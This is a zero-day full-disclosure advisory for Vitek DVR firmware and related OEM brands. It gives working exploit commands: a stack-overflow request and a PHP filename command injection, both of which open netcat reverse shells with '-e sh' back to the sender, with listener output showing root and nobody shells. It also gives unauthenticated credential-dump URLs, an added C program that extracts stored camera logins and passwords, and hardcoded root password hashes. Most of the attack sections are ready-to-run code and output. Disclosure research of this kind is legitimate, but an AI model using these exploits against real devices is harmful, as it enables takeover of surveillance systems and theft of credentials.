Vitek Remote Code Execution / Information Disclosure


Vitek suffers from remote code execution and information disclosure vulnerabilities.

 

[STX]

Subject: Vitek RCE and Information Disclosure (and possibly other OEMs)

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day

heap: Executable + Non-ASLR
stack: Executable + ASLR

-[Manufacturer Logo]-
            _ _ _ _ _ _ _ _ _ _ _ _
            \  _  _   _  _ _ ___
            / /__/ \ |_/
           / __   /  -  _ ___
          / /  / /  / /
  _ _ _ _/ /  /  \_/  \_ ______
___________\___\__________________


-[OEMs (brand names found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC


-[Stack Overflow RCE]-

[Reverse netcat shell]

$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81

[Listener]

$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337

Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.

pwd
/opt/fw

whoami
root
exit
$

Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. The H4/H1/N1 binaries replace 0x20 with 0x00. A NUL cannot be sent directly, so send 0x20 where a 0x00 is needed and let the binary produce it; this is how the return address 0x00114AC8 [the system() call gadget in H4] is delivered as \xc8\x4a\x11\x20.
3. The CMD string lands on the heap at 0x02739A0C. The gadget computes R0 = R11 - 0x74 before calling system(), so the overwritten R11 must be 0x02739A0C + 0x74 = 0x02739A80 for R0 to point at the CMD string.

H1:
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138                 SUB             R3, R11, #0x74
.text:001CD13C                 MOV             R0, R3
.text:001CD140                 BL              system

H4:
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8                 SUB             R3, R11, #0x74
.text:00114ACC                 MOV             R0, R3
.text:00114AD0                 BL              system

N1:
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C                 SUB             R3, R11, #0x74
.text:001E9F10                 MOV             R0, R3
.text:001E9F14                 BL              system


-[PHP RCE]-

Note: /mnt/usb2 must be mounted read/write (it is normally read-only unless a USB stick is inserted). The uploaded file name reaches a shell unescaped, so the "filename" below carries the command; ${REMOTE_ADDR} is expanded by that shell from the CGI environment, so the reverse shell connects back to whoever sent the request. The shell runs as the web server user (nobody), not root.

[Reverse netcat shell (forking)]

$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST

200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form>	</tbody>
[...]

[Listener]

$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.

pwd
/opt/www/htdocs/system

whoami
nobody

ls -l /mnt/usb2/
total 4
drwxrwxrwx    2 nobody   nobody           0 Dec 16 02:55 dvr
-rw-------    1 nobody   nobody           7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$

-[Login / Password Disclosure]-

curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config, fetched without authentication; it holds the admin login/password and the login/password of every connected camera in plain text]

Admin l/p
[...]
00001380  00 00 00 00 01 01 00 01  01 01 01 00 00 00 00 00  |................|
00001390  00 00 00 00 00 41 44 4d  49 4e 00 00 00 00 00 00  |.....ADMIN......|
000013a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001400  00 00 00 00 00 00 00 00  00 00 00 00 00 00 31 32  |..............12|
00001410  33 34 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |34..............|
00001420  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

Cameras l/p
[...]
00008d80  00 00 00 00 c0 00 a8 00  01 00 15 00 92 1f 00 00  |................|
00008d90  91 1f 00 00 72 6f 6f 74  00 00 00 00 00 00 00 00  |....root........|
00008da0  00 00 00 00 70 61 73 73  00 00 00 00 00 00 00 00  |....pass........|
00008db0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00008dc0  00 00 00 00 00 00 00 00  00 00 00 00 c0 00 a8 00  |................|
00008dd0  01 00 16 00 94 1f 00 00  93 1f 00 00 72 6f 6f 74  |............root|
00008de0  00 00 00 00 00 00 00 00  00 00 00 00 70 61 73 73  |............pass|
00008df0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
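The camera entries in the dump above repeat at a fixed stride (0x8dcc - 0x8d84 = 72 bytes), and each holds the camera's IPv4 octets as little-endian 16-bit words (192.168.1.21, 192.168.1.22), two little-endian 32-bit values (0x1f92/0x1f91 and 0x1f94/0x1f93, apparently ports), then a 16-byte login and a 16-byte password. The following C program is an added example, not part of the advisory, that decodes that table from a downloaded menu.env. The record layout, the field widths, the reading of the two 32-bit values as ports and the table offset 0x8d84 are all assumptions inferred from this one dump; the embedded sample is constructed from the bytes shown above.

```c
/* menu_env_cams.c: decode the per-camera credential records in menu.env.
 * Added example, not part of the advisory. The record layout is an assumption
 * inferred from the hexdump in the advisory: four little-endian 16-bit octets of
 * the camera IP, two little-endian 32-bit values (apparently ports), a 16-byte
 * login and a 16-byte password, padded to a 72-byte record. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REC_SIZE      72      /* 0x8dcc - 0x8d84 between the two records in the dump */
#define CAM_TABLE_OFF 0x8d84  /* first record in the dumped file; assumed stable across units */

struct cam_cred {
    char ip[16];
    uint32_t port_a, port_b;  /* the two 32-bit fields after the IP; assumed to be ports */
    char user[17];
    char pass[17];
};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode one record. Returns 0 when the slot is empty or the octets are not a valid IPv4. */
int decode_cam_record(const uint8_t *p, struct cam_cred *c) {
    uint16_t o[4];
    for (int i = 0; i < 4; i++) o[i] = le16(p + 2 * i);
    if (o[0] == 0 || o[0] > 255 || o[1] > 255 || o[2] > 255 || o[3] > 255) return 0;
    snprintf(c->ip, sizeof c->ip, "%u.%u.%u.%u", o[0], o[1], o[2], o[3]);
    c->port_a = le32(p + 8);
    c->port_b = le32(p + 12);
    memcpy(c->user, p + 16, 16); c->user[16] = '\0';   /* fixed width, NUL padded */
    memcpy(c->pass, p + 32, 16); c->pass[16] = '\0';
    return 1;
}

/* Walk the table from `start` in REC_SIZE steps until an empty slot or end of buffer. */
int decode_cam_table(const uint8_t *buf, size_t len, size_t start, struct cam_cred *out, int max) {
    int n = 0;
    for (size_t off = start; off + REC_SIZE <= len && n < max; off += REC_SIZE) {
        if (!decode_cam_record(buf + off, &out[n])) break;
        n++;
    }
    return n;
}

/* Constructed sample: the two records at 0x8d84 and 0x8dcc of the advisory's hexdump. */
const uint8_t SAMPLE_TABLE[2 * REC_SIZE] = {
    0xc0,0x00,0xa8,0x00,0x01,0x00,0x15,0x00, 0x92,0x1f,0x00,0x00, 0x91,0x1f,0x00,0x00,
    'r','o','o','t',0,0,0,0,0,0,0,0,0,0,0,0,  'p','a','s','s',0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0xc0,0x00,0xa8,0x00,0x01,0x00,0x16,0x00, 0x94,0x1f,0x00,0x00, 0x93,0x1f,0x00,0x00,
    'r','o','o','t',0,0,0,0,0,0,0,0,0,0,0,0,  'p','a','s','s',0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
};

/* Usage: curl -s http://192.168.57.20/menu.env -o menu.env && ./menu_env_cams menu.env
 * Without an argument the embedded sample is decoded instead. */
int main(int argc, char **argv) {
    struct cam_cred cams[64];
    int n;
    if (argc > 1) {
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror(argv[1]); return 1; }
        uint8_t *buf = malloc(1 << 20);
        size_t len = buf ? fread(buf, 1, 1 << 20, f) : 0;
        fclose(f);
        n = decode_cam_table(buf, len, CAM_TABLE_OFF, cams, 64);
        free(buf);
    } else {
        n = decode_cam_table(SAMPLE_TABLE, sizeof SAMPLE_TABLE, 0, cams, 64);
    }
    for (int i = 0; i < n; i++)
        printf("cam %d: %s ports %u/%u login %s password %s\n",
               i + 1, cams[i].ip, cams[i].port_a, cams[i].port_b, cams[i].user, cams[i].pass);
    return 0;
}
```

The admin credentials sit elsewhere in the file (ADMIN at 0x1395, 1234 at 0x140e in the dump) and are not covered by this table walk; a plain `strings -t x menu.env` is enough to locate them.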

-[Hardcoded l/p]-
FTP: TCP/10021
TELNET: TCP/10023

/etc/passwd (MD5-crypt hashes shipped in the firmware image)
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh

-[Korean hardcoded DNS]-
$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$

$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa	name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa	name = kns2.kornet.net.


-[Other Information Disclosure]-
curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1

-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L

curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.2.0     0.0.0.0         255.255.255.0   U     0      0        0 eth1
192.168.57.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
0.0.0.0         192.168.57.1    0.0.0.0         UG    0      0        0 eth0

curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English

[... and more]

[ETX]

Source: https://packetstormsecurity.com/files/145534/Vitek-Remote-Code-Execution-Information-Disclosure.html
